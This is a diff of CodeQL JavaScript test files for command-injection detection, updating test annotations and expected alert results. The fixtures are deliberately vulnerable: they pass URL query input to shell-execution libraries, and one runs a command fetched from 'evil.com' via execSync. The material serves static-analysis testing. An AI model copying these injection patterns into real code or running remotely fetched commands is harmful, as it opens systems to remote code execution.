@@ -2,34 +2,34 @@ var http = require("http"), url = require("url"); var server = http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; - - require("cross-spawn").sync(cmd); // NOT OK - require("execa").shell(cmd); // NOT OK - require("execa").shellSync(cmd); // NOT OK - require("execa").stdout(cmd); // NOT OK - require("execa").stderr(cmd); // NOT OK - require("execa").sync(cmd); // NOT OK - - require("cross-spawn")(cmd); // NOT OK - require("cross-spawn-async")(cmd); // NOT OK - require("exec")(cmd); // NOT OK - require("exec-async")(cmd); // NOT OK - require("execa")(cmd); // NOT OK - require("remote-exec")(target, cmd); // NOT OK + let cmd = url.parse(req.url, true).query.path; // $ Source + + require("cross-spawn").sync(cmd); // $ Alert + require("execa").shell(cmd); // $ Alert + require("execa").shellSync(cmd); // $ Alert + require("execa").stdout(cmd); // $ Alert + require("execa").stderr(cmd); // $ Alert + require("execa").sync(cmd); // $ Alert + + require("cross-spawn")(cmd); // $ Alert + require("cross-spawn-async")(cmd); // $ Alert + require("exec")(cmd); // $ Alert + require("exec-async")(cmd); // $ Alert + require("execa")(cmd); // $ Alert + require("remote-exec")(target, cmd); // $ Alert const ssh2 = require("ssh2"); - new ssh2().exec(cmd); // NOT OK - new ssh2.Client().exec(cmd); // NOT OK + new ssh2().exec(cmd); // $ Alert + new ssh2.Client().exec(cmd); // $ Alert const SSH2Stream = require("ssh2-streams").SSH2Stream; - new SSH2Stream().exec(false, cmd); // NOT OK + new SSH2Stream().exec(false, cmd); // $ Alert - require("execa").node(cmd); // NOT OK + require("execa").node(cmd); // $ Alert - require("foreground-child")(cmd); // NOT OK + require("foreground-child")(cmd); // $ Alert const opener = require("opener"); - opener("http://github.com/" + url.parse(req.url, true).query.user); // OK - opener("http://github.com", { command: cmd }); // NOT OK + opener("http://github.com/" + url.parse(req.url, true).query.user); 
+ opener("http://github.com", { command: cmd }); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js index cec3f36aa492..deb426291d6a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js @@ -2,7 +2,7 @@ let https = require("https"), cp = require("child_process"); https.get("https://evil.com/getCommand", res => - res.on("data", command => { - cp.execSync(command); + res.on("data", command => { // $ Source + cp.execSync(command); // $ Alert }) ); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-078/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql deleted file mode 100644 index 77e19c320dff..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql +++ /dev/null 
@@ -1,23 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.CommandInjectionQuery as CommandInjection -import semmle.javascript.security.dataflow.IndirectCommandInjectionQuery as IndirectCommandInjection -import semmle.javascript.security.dataflow.ShellCommandInjectionFromEnvironmentQuery as ShellCommandInjectionFromEnvironment -import semmle.javascript.security.dataflow.UnsafeShellCommandConstructionQuery as UnsafeShellCommandConstruction -import semmle.javascript.security.dataflow.SecondOrderCommandInjectionQuery as SecondOrderCommandInjectionQuery - -deprecated class CommandInjectionConsistency extends ConsistencyConfiguration { - CommandInjectionConsistency() { this = "ComandInjection" } - - override File getAFile() { not result.getBaseName() = "uselesscat.js" } -} - -import semmle.javascript.security.UselessUseOfCat - -deprecated class UselessCatConsistency extends ConsistencyConfiguration { - UselessCatConsistency() { this = "Cat" } - - override DataFlow::Node getAnAlert() { result instanceof UselessCat } - - override File getAFile() { result.getBaseName() = "uselesscat.js" } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.expected b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.expected index af0b8090ff7b..7c7321845776 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.expected 
@@ -1,3 +1,44 @@ +#select +| actions.js:4:6:4:29 | process ... _DATA'] | actions.js:4:6:4:16 | process.env | actions.js:4:6:4:29 | process ... _DATA'] | This command depends on an unsanitized $@. | actions.js:4:6:4:16 | process.env | environment variable | +| actions.js:8:10:8:23 | e['TEST_DATA'] | actions.js:12:6:12:16 | process.env | actions.js:8:10:8:23 | e['TEST_DATA'] | This command depends on an unsanitized $@. | actions.js:12:6:12:16 | process.env | environment variable | +| actions.js:14:6:14:21 | getInput('data') | actions.js:14:6:14:21 | getInput('data') | actions.js:14:6:14:21 | getInput('data') | This command depends on an unsanitized $@. | actions.js:14:6:14:21 | getInput('data') | GitHub Actions user input | +| command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | command-line-parameter-command-injection.js:8:22:8:33 | process.argv | command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:8:22:8:33 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:11:14:11:20 | args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:11:14:11:20 | args[0] | This command depends on an unsanitized $@. 
| command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:19:14:19:17 | arg0 | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:19:14:19:17 | arg0 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | This command depends on an unsanitized $@. 
| command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | command-line-parameter-command-injection.js:30:21:30:46 | require ... rgs")() | command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:30:21:30:46 | require ... rgs")() | command-line argument | +| command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | command-line-parameter-command-injection.js:32:21:32:41 | require ... ").argv | command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:32:21:32:41 | require ... ").argv | command-line argument | +| command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | command-line-parameter-command-injection.js:33:21:33:44 | require ... ").argv | command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:33:21:33:44 | require ... 
").argv | command-line argument | +| command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | command-line argument | +| command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | command-line argument | +| command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | command-line argument | +| command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | command-line argument | +| command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() | command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:58:17:58:40 | require ... 
parse() | command-line argument | +| command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | command-line argument | +| command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | command-line argument | +| command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | command-line-parameter-command-injection.js:76:15:76:26 | process.argv | command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:76:15:76:26 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | command-line-parameter-command-injection.js:82:29:82:40 | process.argv | command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:82:29:82:40 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | command-line-parameter-command-injection.js:85:34:85:45 | process.argv | command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | This command depends on an unsanitized $@. 
| command-line-parameter-command-injection.js:85:34:85:45 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | command-line-parameter-command-injection.js:88:25:88:36 | process.argv | command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:88:25:88:36 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | command-line argument | +| command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | command-line argument | +| command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | command-line argument | +| command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | This command depends on an unsanitized $@. 
| command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | command-line argument | +| command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | command-line argument | +| command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | command-line argument | +| command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | command-line argument | +| command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | command-line argument | +| command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:133:10:133:16 | program | command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. 
| command-line-parameter-command-injection.js:133:10:133:16 | program | command-line argument | +| command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | command-line argument | +| command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | command-line argument | +| command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | command-line argument | +| command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | command-line argument | edges | actions.js:4:6:4:16 | process.env | actions.js:4:6:4:29 | process ... _DATA'] | provenance | | | actions.js:7:15:7:15 | e | actions.js:8:10:8:10 | e | provenance | | 
@@ -290,44 +331,3 @@ nodes | command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | semmle.label | "cmd.sh ... zzaType | | command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | semmle.label | program.pizzaType | subpaths -#select -| actions.js:4:6:4:29 | process ... _DATA'] | actions.js:4:6:4:16 | process.env | actions.js:4:6:4:29 | process ... _DATA'] | This command depends on an unsanitized $@. | actions.js:4:6:4:16 | process.env | environment variable | -| actions.js:8:10:8:23 | e['TEST_DATA'] | actions.js:12:6:12:16 | process.env | actions.js:8:10:8:23 | e['TEST_DATA'] | This command depends on an unsanitized $@. | actions.js:12:6:12:16 | process.env | environment variable | -| actions.js:14:6:14:21 | getInput('data') | actions.js:14:6:14:21 | getInput('data') | actions.js:14:6:14:21 | getInput('data') | This command depends on an unsanitized $@. | actions.js:14:6:14:21 | getInput('data') | GitHub Actions user input | -| command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | command-line-parameter-command-injection.js:8:22:8:33 | process.argv | command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:8:22:8:33 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:11:14:11:20 | args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:11:14:11:20 | args[0] | This command depends on an unsanitized $@. 
| command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:19:14:19:17 | arg0 | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:19:14:19:17 | arg0 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | This command depends on an unsanitized $@. 
| command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | command-line-parameter-command-injection.js:30:21:30:46 | require ... rgs")() | command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:30:21:30:46 | require ... rgs")() | command-line argument | -| command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | command-line-parameter-command-injection.js:32:21:32:41 | require ... ").argv | command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:32:21:32:41 | require ... ").argv | command-line argument | -| command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | command-line-parameter-command-injection.js:33:21:33:44 | require ... ").argv | command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:33:21:33:44 | require ... 
").argv | command-line argument | -| command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | command-line argument | -| command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | command-line argument | -| command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | command-line argument | -| command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | command-line argument | -| command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() | command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:58:17:58:40 | require ... 
parse() | command-line argument | -| command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | command-line argument | -| command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | command-line argument | -| command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | command-line-parameter-command-injection.js:76:15:76:26 | process.argv | command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:76:15:76:26 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | command-line-parameter-command-injection.js:82:29:82:40 | process.argv | command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:82:29:82:40 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | command-line-parameter-command-injection.js:85:34:85:45 | process.argv | command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | This command depends on an unsanitized $@. 
| command-line-parameter-command-injection.js:85:34:85:45 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | command-line-parameter-command-injection.js:88:25:88:36 | process.argv | command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:88:25:88:36 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | command-line argument | -| command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | command-line argument | -| command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | command-line argument | -| command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | This command depends on an unsanitized $@. 
| command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | command-line argument | -| command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | command-line argument | -| command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | command-line argument | -| command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | command-line argument | -| command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | command-line argument | -| command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:133:10:133:16 | program | command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. 
| command-line-parameter-command-injection.js:133:10:133:16 | program | command-line argument | -| command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | command-line argument | -| command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | command-line argument | -| command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | command-line argument | -| command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | command-line argument | diff --git 